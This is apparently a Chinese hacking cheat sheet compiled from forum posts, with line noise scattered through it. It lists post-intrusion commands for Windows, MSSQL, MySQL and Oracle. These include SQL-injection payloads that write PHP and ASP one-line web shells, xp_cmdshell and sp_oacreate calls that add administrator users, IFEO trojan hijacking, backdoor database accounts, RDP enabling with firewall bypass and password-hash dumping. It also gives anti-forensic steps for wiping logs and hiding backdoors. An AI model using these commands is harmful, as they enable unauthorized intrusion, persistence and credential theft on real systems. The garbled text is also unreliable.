0 o q* f) x* [5 ~7 z& M; B8 |6 W1.net user administrator /passwordreq:no
; u$ P$ x/ v8 [3 t这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
5 }" X- C! A8 H1 S( j2.比较巧妙的建克隆号的步骤
: [2 t3 r- t# |' x) H5 X2 m5 v) W先建一个user的用户! K7 S: C- P& @5 ]% _( \8 }5 i, m
然后导出注册表。然后在计算机管理里删掉
9 k$ P8 v% {+ n( r, n在导入,在添加为管理员组/ p1 S3 ~' B# o
3.查radmin密码
) |' D( N$ W# W% Nreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg2 O7 W6 v3 k" g6 c3 L8 Q
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]* m$ r0 n& ^. C- ^/ `3 I
建立一个"services.exe"的项# j) p3 C/ W1 i" P' |' m8 l/ R
再在其下面建立(字符串值)
& M) M y) O1 l8 ]键值为mu ma的全路径
$ r' }0 g" g% n! x# q0 g9 Y5.runas /user:guest cmd5 f5 {: A, ]1 I/ b
测试用户权限!4 v" l' Y: U/ L& t; [( |
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
I& U5 H2 p6 H5 F3 ~! H7.入侵后漏洞修补、痕迹清理,后门置放:
: p) y; H' Q, u基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
$ Q# Q0 y1 e( J* W8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
3 E7 w% ?' u0 H. X f9 ?# j3 `! _3 o+ i) F
for example1 E9 D4 q& R, ~" B* k4 T, A. x
+ X: M' E9 u& [; udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'3 Y4 b1 s7 M$ x! n4 t; P5 q
+ L2 l( C: n" n) ^ cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
; X# v0 ]. S2 K9 ~% b# M6 a' x, u& J3 v* {/ |2 S
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
# |0 W: M- I8 t, P% J& ?" o4 w如果要启用的话就必须把他加到高级用户模式- s1 |- Q2 f a1 \% Y8 ^
可以直接在注入点那里直接注入
4 _6 M4 X! R1 j8 Hid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--) Z7 D8 w- \3 G
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--" ]! i# i' {6 h0 }0 r* ]* N1 [( y! K& {
或者7 ^- T$ l" f3 @; h [
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'* [1 P! N( a/ ^4 h
来恢复cmdshell。. P; T L2 ]' Y W5 r9 g* H
& p# ]' m, {& u, d3 q
分析器
& j2 g& e& L. B: S, _( `EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
) ?0 Y, U5 B$ U- t1 X然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
* F2 \' @. l. J; h9 B10.xp_cmdshell新的恢复办法6 M+ m) a6 W/ x c* H+ O2 v+ h
xp_cmdshell新的恢复办法
) l6 x0 k& W1 H: s( r扩展储存过程被删除以后可以有很简单的办法恢复:" X2 q8 K- p* U6 |
删除# b+ ~7 I Y" F8 S
drop procedure sp_addextendedproc
8 ^ Y4 i8 Y2 W7 g- E& gdrop procedure sp_oacreate
$ d# M8 W y2 Kexec sp_dropextendedproc 'xp_cmdshell'( d: V# Y5 k% W ]/ G) {$ F
. n. N0 i/ U7 P. c恢复
2 s' w: D" l) |+ ?/ y7 g& [3 edbcc addextendedproc ("sp_oacreate","odsole70.dll")
5 L6 [) x0 Q! L/ s4 E; Ydbcc addextendedproc ("xp_cmdshell","xplog70.dll")
) D1 t; P3 m# G& f
% D6 k8 u( M% V; W( |这样可以直接恢复,不用去管sp_addextendedproc是不是存在 e. p( Q( J6 }$ z, e! \
& N+ c# N, R' [! O" T0 S8 ]-----------------------------7 |5 ]& h1 j6 g8 y2 g* O" B2 B6 U% ^
) m! e9 u! I; l2 N( j5 Z) D9 P# R
删除扩展存储过过程xp_cmdshell的语句:
) p6 K6 {0 [8 h4 |* z1 Bexec sp_dropextendedproc 'xp_cmdshell'
/ P: M: j' N' \ E. S
& @1 F8 g8 d# J: f3 r s# Q# p恢复cmdshell的sql语句
+ g7 d L* a( K0 Xexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'8 p- \% w# s' a' s" r2 d
1 ^; O# ^9 E8 a; W: j+ R
% X/ s$ \ m3 |0 L' {开启cmdshell的sql语句
+ g, ^! L& z9 ]; ^
$ m: q7 u3 i3 S) S; ^5 E& Uexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" B3 O' y0 }/ P* q z
% j% f- }/ Q/ d4 S: ^9 m
判断存储扩展是否存在
9 T1 O h3 v3 {; O1 A' U/ ]4 Q8 l2 Hselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'' A7 y# T) y4 K$ @- ~
返回结果为1就ok
, H4 S7 |+ D% [, g5 N4 D1 i1 `) S0 X; h1 I4 q
恢复xp_cmdshell+ b2 R4 O j% `( I
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; S" ^( q7 ?' d5 b3 i
返回结果为1就ok
$ P& j( a w& b# @+ t; R$ T
8 K7 r4 _7 D$ U! z: g否则上传xplog7.0.dll
! H4 k7 r; N1 p" E) _exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
% ~; @. v. Z |; q* T
- l. P5 h' L3 b+ v* N0 G' C堵上cmdshell的sql语句; j/ l: V, ?8 A0 j
sp_dropextendedproc "xp_cmdshel, _1 Z8 Y0 F, ^" ~1 y5 t
-------------------------- V6 A8 X! I5 b9 `1 N
清除3389的登录记录用一条系统自带的命令:
7 k/ u, C' Y# U: g3 t& Qreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f1 i \/ X; s, w' \" ~
8 m; F4 F' C$ T& A# g5 T然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
- C" n4 M8 h- J4 B" X6 J9 i3 l在 mysql里查看当前用户的权限4 v' V1 `% w2 ~# x* V. T
show grants for
! q r( A0 L: V8 R# G8 t) j3 R& U
% c$ F: x+ \/ r4 t以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。7 O0 \( s( u/ c$ }# z
( n& u/ e( `5 Y" z, z6 \' x6 H- e, R! G" _! M
Create USER 'itpro'@'%' IDENTIFIED BY '123';
0 T- r' I. j2 D
W+ v) O2 F& ` \- d; WGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
& C) b3 D# r$ ?7 \4 O' e4 [# L" [
" }* S- |! N1 v; `0 ?4 cMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 T! B8 L* w" d9 J! _( V
7 W8 a! C& p+ vMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% j, p, D6 z- N4 X" a/ }
% t6 z$ \/ z) r搞完事记得删除脚印哟。
% T0 K; a X5 a/ x! t$ D! e- q- t" n) Y
Drop USER 'itpro'@'%';
9 ?7 ?# f- F- u' W. Q& d2 c! |* O! D4 |
Drop DATABASE IF EXISTS `itpro` ;
7 ]8 m- ?9 r# K8 o" j. |6 [- }3 r6 r) G0 `. I$ H; G
当前用户获取system权限' v( R- x5 M/ P3 u/ U' o
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
7 d3 [ l' L! e0 S! k0 i! dsc start SuperCMD. h0 }5 U1 w: Q; A" w
程序代码% {) r/ |! l2 w
<SCRIPT LANGUAGE="VBScript">
" l6 p* t! Y: S2 Yset wsnetwork=CreateObject("WSCRIPT.NETWORK")
0 j5 Z6 T7 g. U' H; Q: {/ yos="WinNT://"&wsnetwork.ComputerName
0 M& X4 W1 x2 P8 H$ V0 ESet ob=GetObject(os)
0 R* e" ~5 [9 L: k. t& s) F1 nSet oe=GetObject(os&"/Administrators,group")& m* k7 t1 L( a( F# i& k
Set od=ob.Create("user","nosec")
6 t, N+ b2 ^ p! \od.SetPassword "123456abc!@#"3 D% R4 |% r6 [& `. `( g
od.SetInfo
. }, d/ a9 |0 ~Set of=GetObject(os&"/nosec",user)8 W2 R' d& y% V$ d, k
oe.add os&"/nosec"3 A9 J0 `) O- \: s7 G
</Script>0 b, l" Z* p! ]; k5 B# f
<script language=javascript>window.close();</script>
6 c p2 A; G }
8 d c# g0 @9 I4 |( C q# H( a+ b" w5 f9 o; T4 M
& {9 ]7 S7 X1 _# Y
# t+ m, [: Z; @ i
突破验证码限制入后台拿shell$ T0 I% g$ @; z7 z+ Y4 b2 `( n/ y
程序代码
8 v; ^2 e! ?- R4 eREGEDIT4 ; p& n j3 U8 i. h3 ]" l
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
* _! O' Q* J1 [: T"BlockXBM"=dword:00000000
9 P& _3 C& b8 N1 `1 l- R6 S, J
1 G: w0 E4 p# n: O+ J$ _8 M! c保存为code.reg,导入注册表,重器IE' ?# j4 E8 Q& r( S' e
就可以了( p1 A% B; O7 ~+ Q/ e2 U% \
union写马: W0 K6 H F6 @3 ]' v) g$ a
程序代码; K1 B% s5 Z0 W/ t( V
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
7 _( a1 h1 N) x4 C: r5 q
6 I- q2 R4 t6 }6 p应用在dedecms注射漏洞上,无后台写马
0 g$ T7 p% R2 ~; udedecms后台,无文件管理器,没有outfile权限的时候% t; O' U7 b, X9 T6 Z ?5 R: }
在插件管理-病毒扫描里
H1 F2 X, S5 Y. X \1 u f写一句话进include/config_hand.php里
4 ^ D( Y% `: P$ T程序代码" X+ }! l, D; o/ D! a2 I2 Y
>';?><?php @eval($_POST[cmd]);?>
% X$ \2 U7 ]1 Z% r* x/ M
2 ^/ q- D: d P2 z) ~ g) c v
0 X/ H; i A) T. _& \. t如上格式
7 b4 ^) y& }+ l& @$ f- T' q0 Z5 W
; T6 @9 r# T) Q5 _oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解) a: x6 S6 S. v3 @4 k9 t" ?1 S% I/ [
程序代码) P7 C, {4 }6 I( }9 i; T# f6 F
select username,password from dba_users;
9 j J( ^) h$ X+ c4 X& Q* n# c0 q+ A
6 N5 y# L7 X: O& E% ]9 Ymysql远程连接用户! D2 G6 j. P" D+ O8 N3 I
程序代码& ?; A9 u$ o- t( j& q: u" I
5 R p' q* m% |Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
9 ?8 ~- _: x# ~( N* ?7 U5 sGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION7 O0 |- {! g B9 |: l
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 `9 C1 I* u+ L! kMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 o( b5 u. u) r! P! f, b' K
% k7 E# Q( q- D( _3 N/ Z% j+ D) M5 U
7 y$ r' _8 J2 B8 p3 |# l- E: l: @
& ~8 n7 W! I' S/ a. n( gecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
! ~! m* W" V- l9 k0 B' R5 q/ N" Z* _- P8 Y7 [
1.查询终端端口
; l5 ]1 w! z& e9 [
( ?0 ?1 u' ?7 h. qxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
* m$ V. w. A2 S! |, h; Z+ ~6 `. |% b9 M! h+ f0 S9 j* l
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
0 H2 |. H; D) \0 etype tsp.reg
$ S* j5 Z$ L1 l
6 q- x* S( @+ r4 Q0 u7 b U2.开启XP&2003终端服务
8 ^; N% t2 y8 R' D8 |- u
4 I |+ A; B7 x" Y# X* U
; d, m- A1 g! @/ o @5 _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f$ S+ j/ J8 P5 y6 B8 d* ]: z
2 Q4 H4 h9 |5 }
# F3 v- _& M) e5 H4 |2 cREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f- n! J% G" H! _8 j# n
3 X0 M0 F% O$ }+ R# l M
3.更改终端端口为20008(0x4E28)$ z9 w% M) @1 Y E% H
8 L7 c7 m# b5 h) u
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 D3 N$ K- i4 z( n
& Y4 b, ~' h+ E- F# gREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f* p6 g2 k: M& F* Z7 I7 Z& k8 s
" |/ t9 V; D8 D8 ]; [! I6 O0 G% F
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
9 ^3 u: ]/ C+ \- {% v* U- z/ R% E. y7 }: J; b
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f' r3 e( p, H2 ]3 ^2 e# F2 C
2 y9 S. e+ t6 l7 [. O3 v
6 P9 Z* C1 n0 I! P5.开启Win2000的终端,端口为3389(需重启)
- b; P8 n; t- H" S" ], }8 Q0 X$ b# P
echo Windows Registry Editor Version 5.00 >2000.reg / s4 c1 M. w( ]. C
echo. >>2000.reg
( H4 `( l: {0 Y! uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 F& b. S2 i$ ]5 b( g" {9 C
echo "Enabled"="0" >>2000.reg ( @3 G, p! `- }* x3 d3 f0 ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
4 b( H# T, l2 p9 N2 Jecho "ShutdownWithoutLogon"="0" >>2000.reg
8 i! k' C- x4 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
: S9 J, B: Y+ J+ R+ _' K ?# Yecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
: T3 I7 |8 Z$ v" n' p5 D3 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg . I( ^8 k2 {; V6 I
echo "TSEnabled"=dword:00000001 >>2000.reg
; |. e$ l$ S" `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg $ j6 z; J& c; {/ i& ?- _
echo "Start"=dword:00000002 >>2000.reg ( Q# e, p& ^$ p9 I' F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
' K5 T2 }; W1 o7 D9 T$ G& wecho "Start"=dword:00000002 >>2000.reg
2 z8 M/ b% \0 Q% r) S. {( Decho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ' y9 w( j& m# K1 G4 c, v
echo "Hotkey"="1" >>2000.reg
7 s, R2 F# W3 U, x+ S" }1 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
) J, G( H7 v7 A. a" g8 D. x& Vecho "ortNumber"=dword:00000D3D >>2000.reg $ z! u3 Z) v0 D. x) I% [ H% q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ! o- R: o. {7 I7 L6 j* i/ ]$ M
echo "ortNumber"=dword:00000D3D >>2000.reg
$ h& u8 |! A; J: ]8 ^5 n9 b+ o' X: C* a5 z+ H
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
: `, G& Y; i2 y! \8 c. x @4 u3 w9 L2 i7 A$ e' D
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf' v5 K. _* p! e4 \
(set inf=InstallHinfSection DefaultInstall)% H$ O. r! @' l( ^1 X. |! |) Q
echo signature=$chicago$ >> restart.inf
_6 }* t* a9 V" ~/ B# x( {! y" Becho [defaultinstall] >> restart.inf$ k; p- p0 L) h: S* ~! v) z8 r0 |
rundll32 setupapi,%inf% 1 %temp%\restart.inf
3 o+ |3 B0 Z2 P" q* W% r' |/ f$ c; ^/ t4 S5 X* V6 e. Q4 r
+ o. Z3 O& L4 W. L$ o8 u1 Q" m
7.禁用TCP/IP端口筛选 (需重启)
& i) s! a( Z( ^( c- y: o3 C7 y
, O: o2 J, s a0 d- A' FREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f' T/ ^2 L2 [( S, P% T) `
4 q8 Z; a% Y* S+ }4 @
8.终端超出最大连接数时可用下面的命令来连接+ A0 H; l- p# F5 r' T
5 _9 { M& \# ~# smstsc /v:ip:3389 /console: J; |! b; c# c9 A# y
; v, k4 H) f2 C9 n- z- V
9.调整NTFS分区权限: Q, [: f. q1 ~) \
% O1 D" m* V4 q1 _2 ~
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
4 i" l) i$ g: `9 F% Y1 F" O
! k. P. ]1 c( q' D$ J% m& f Jcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件), o" m" Z4 {/ S" y4 G9 J6 j$ S
( r0 [% J& J" C( b, `
------------------------------------------------------& X/ M! j3 s) A' P; K' u5 c
3389.vbs
/ V5 @+ s2 d( q1 L. \4 L( u: l3 ?On Error Resume Next
# t0 ?$ W* H9 h1 x4 E5 \const HKEY_LOCAL_MACHINE = &H80000002
# U. r/ U6 i$ K7 Q" Q" T' f' WstrComputer = "."3 Z" c; Q8 [3 P9 m" F
Set StdOut = WScript.StdOut
' ? J; R+ r* Z' cSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
+ u3 w% o1 v4 Z( M- ^$ D W9 E2 nstrComputer & "\root\default:StdRegProv")
# S5 `; Z" ?' F: b6 }strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server", m/ U7 c' S- o6 {
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' V2 C6 O- S+ x) P* z9 x8 w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* G$ B! w+ ]; P/ h, ^oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# H2 i% ]4 L* l, J
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' r; o" c5 I6 p7 ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
$ L* B( d6 ]& V, X( p# s0 w$ jstrValueName = "fDenyTSConnections"
7 e9 E; [" w0 G. J Q% rdwValue = 0
1 X# P7 L1 g5 Z/ t5 h0 V* joreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* {; E5 ?% ~' E- x/ @ JstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 c6 C' ?) r2 ?8 j1 f: pstrValueName = "ortNumber"
! [0 H/ y/ {1 c* d" n; [& pdwValue = 3389
4 M: P4 m. E0 F- }3 {oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
( s5 J, U3 Q& h9 c' L9 JstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
; S( [: X" h, i, L3 v# B5 qstrValueName = "ortNumber"/ c+ }0 Y: g0 i' Q
dwValue = 3389
2 P$ Z* O1 V+ doreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue! P4 W$ X! ? V' L( V2 I
Set R = CreateObject("WScript.Shell")
5 D8 C4 M# V# h( T' LR.run("Shutdown.exe -f -r -t 0") 5 I% v0 K ~* p2 p/ q/ G7 }
! ?( g7 y7 [' n- V: q删除awgina.dll的注册表键值
) `6 ]; }* G7 ] U1 ?5 n/ G程序代码
4 ~2 h5 Y$ e, D
: @' D" J( k' _reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
' R8 |$ |5 a& w3 _* O' B
1 }3 \; Q. A% d6 p) X. m x+ x+ ^# u8 w3 R
7 v6 ?8 L8 ?' u0 P/ O: C- g
9 u, e8 O5 B1 ?+ v* X程序代码
4 E" \& `& ]' h5 u7 [3 NHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash; L/ p1 y5 u! P- {, `/ D
$ V5 f5 m+ ~; o( F
设置为1,关闭LM Hash( H- |/ b$ y4 x, U
* B8 k, ~# W9 N; |: \6 n R
数据库安全:入侵Oracle数据库常用操作命令, `, @6 B1 e! M: m
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。4 x# Y5 J) k5 c. d
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
C6 i! z; W/ e9 d7 s# o! ]' w2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 O# z5 f, L0 Y) E- G0 ^8 J1 y# ]3、SQL>connect / as sysdba ;(as sysoper)或
& f$ s4 [7 m1 tconnect internal/oracle AS SYSDBA ;(scott/tiger)
9 p' D8 e+ a0 j/ O3 \/ y# d+ H5 vconn sys/change_on_install as sysdba;
- ~/ a0 s2 p$ }4、SQL>startup; 启动数据库实例
5 p, h/ d ?) R) M5、查看当前的所有数据库: select * from v$database;6 c# E9 b9 v2 N2 a, l( {
select name from v$database; p0 {1 f1 F* S% V p- s
6、desc v$databases; 查看数据库结构字段
+ E& x7 F+ P4 }, t( E) G# A7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:; P, s" w% ]. V2 G+ `
SQL>select * from V_$PWFILE_USERS;
5 \: r" z, H% _Show user;查看当前数据库连接用户 c- x: t8 k: L9 M1 ~4 o
8、进入test数据库:database test;! c# D3 X5 H+ w1 |* x
9、查看所有的数据库实例:select * from v$instance;
- ^+ Q! W/ g( i3 \$ ~如:ora9i8 ]6 Z, T9 U0 v8 X8 n: j5 e1 |
10、查看当前库的所有数据表:0 {% M) s% t6 q% h5 j$ X
SQL> select TABLE_NAME from all_tables;1 b# z9 n! ^3 B
select * from all_tables;
0 [, \ a' k! |) H; {SQL> select table_name from all_tables where table_name like '%u%';
( O# G" @) I7 w4 Q7 YTABLE_NAME
/ x$ s3 T/ H8 }8 J3 x2 e------------------------------
; W# h1 `- a# S8 C_default_auditing_options_3 S9 b! z5 r. C7 v. X
11、查看表结构:desc all_tables;
2 F( h5 T8 k# v' l12、显示CQI.T_BBS_XUSER的所有字段结构:; T, J. T- b% m3 W/ Q* d
desc CQI.T_BBS_XUSER;( n& O7 N$ l/ n5 p! w1 d6 G: ]
13、获得CQI.T_BBS_XUSER表中的记录:) [* [# J$ }" M4 k! c
select * from CQI.T_BBS_XUSER;' e& U- v) c e* ~* Z
14、增加数据库用户:(test11/test) K/ }- S9 p7 L! r2 _% A+ H2 }+ g$ z. _
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;2 J9 R2 r5 J% q/ O |4 p
15、用户授权:' x5 j2 u7 o4 ]6 W% [8 }* `
grant connect,resource,dba to test11;. Q- O; F* l5 z& D
grant sysdba to test11;6 o* O! ]( l) M, g7 C( d0 S6 m
commit;
2 Z3 w, Q! j# i/ h16、更改数据库用户的密码:(将sys与system的密码改为test.)
: F. N" }$ s! t: Q" M& F P! F1 Y( salter user sys indentified by test;
& k, ^4 \5 A3 b3 D8 Balter user system indentified by test;
5 |6 N2 V; u; l: V, B3 I# `* C9 }
applicationContext-util.xml2 H3 y B# U1 ^( G1 _% O4 d
applicationContext.xml
; ]- x% R: D( s V! w+ r t5 B/ V( ~struts-config.xml5 d, P& J/ l" O/ N6 V
web.xml: Z9 g c8 J9 z& @9 X; a
server.xml; N3 c; n9 i2 s& f4 U9 w
tomcat-users.xml
% m; X* {5 I3 E0 K. zhibernate.cfg.xml
[3 I! Y3 y) idatabase_pool_config.xml4 m3 x2 ^. a4 X
^% {+ H6 @: J. i+ j: k* j+ y
1 n* ]3 p( ^5 E: {. P9 V4 Q8 R6 S- `
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
3 p% g1 L) r# K7 X\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
9 d7 D S3 T" K* Q! C1 Q0 M\WEB-INF\struts-config.xml 文件目录结构- W# ?* ]( |+ o7 X7 q' f
( n" x) T! n' d& F2 Xspring.properties 里边包含hibernate.cfg.xml的名称2 ~; a" F4 r' H& e4 C
9 I7 U5 K8 u+ W- M! q
$ _8 s k5 }$ w& tC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
* O+ }; X. a R- W+ A
2 p/ }/ T: ~# a6 W如果都找不到 那就看看class文件吧。。
' b: p* ^# I+ m& ]6 ~* e* Z9 b3 |) D' |% z" l4 d7 s
测试1:; v. Y' m8 b+ c' }5 V6 L
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
: H1 L- W5 H( ]+ D# ]# j. h" H: t d. v; Q; t: o* m
测试2:7 \# F4 z9 w+ t1 C* n4 Y! n
1 i2 j+ C( T6 Ucreate table dirs(paths varchar(100),paths1 varchar(100), id int)
8 {* H8 W( C' Y( a. ~7 V/ u1 u+ h M) c, V
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
2 ^" `0 { t" J+ x# i& T. Q
0 D- d5 e4 v; R) DSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 ? r$ E/ g) Z& F9 B
* k g: M' v P4 c Z/ V查看虚拟机中的共享文件:! h/ ]! J$ C9 Y( [5 Q
在虚拟机中的cmd中执行
+ h# x0 a- ], L+ {% v w1 B\\.host\Shared Folders/ _2 U0 |5 w9 e N8 N
7 L9 s+ D# u; Y6 s0 ?1 I2 g9 j) pcmdshell下找终端的技巧
0 i- `) h1 M0 g7 Z- E; z: y找终端:
# G. F. l' }! T A第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' ?2 T3 B) N7 t+ z; D 而终端所对应的服务名为:TermService / E. X& _' A3 |! b+ U* {
第二步:用netstat -ano命令,列出所有端口对应的PID值!
2 h7 ?: N; D( h3 E0 d6 t 找到PID值所对应的端口
- a; e0 l$ f" R, q# T. }+ l1 w2 a6 b/ U' ~4 Y7 W8 i
查询sql server 2005中的密码hash
% Y# h/ U5 Q b( k6 k+ r3 |SELECT password_hash FROM sys.sql_logins where name='sa'
7 v7 x. I7 f( _! e0 p8 D1 PSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a" D3 P8 P1 t. }8 D, T0 f+ ]
access中导出shell! C' L z0 n8 o/ I7 w' x3 |% z
' t' B, U F& ^, `中文版本操作系统中针对mysql添加用户完整代码:
2 x4 B B( i5 D3 T v o# E! V) b6 C
use test;
3 M. N+ K+ b* ^9 T N. hcreate table a (cmd text);
